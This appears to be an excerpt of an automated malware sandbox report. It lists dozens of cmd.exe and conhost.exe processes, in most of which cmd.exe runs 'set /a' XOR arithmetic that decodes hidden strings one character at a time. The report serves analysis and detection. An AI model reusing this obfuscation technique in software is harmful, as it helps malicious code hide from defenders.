                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "244^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:5
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:6
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "227^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:7
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:8
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "255^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:10
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "244^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:11
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:12
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "253^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:13
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:14
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "130^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:15
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:16
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "131^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:17
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:18
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "139^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:19
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:20
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "139^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:21
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:22
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "242^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:23
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:24
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "195^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:25
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:26
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "212^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:27
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:28
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "208^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:29
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:30
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "197^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:31
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:32
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "212^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:33
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:34
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "247^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:35
                                                                                                                Start time:06:02:24
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:36
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:37
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:38
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "221^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:39
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:40
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "212^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:41
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:42
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "240^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:43
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:44
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "153^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:45
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:46
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "220^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:47
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:48
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:49
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:50
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "195^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:51
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:52
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "133^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:53
                                                                                                                Start time:06:02:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:54
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:55
                                                                                                                Start time:06:02:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

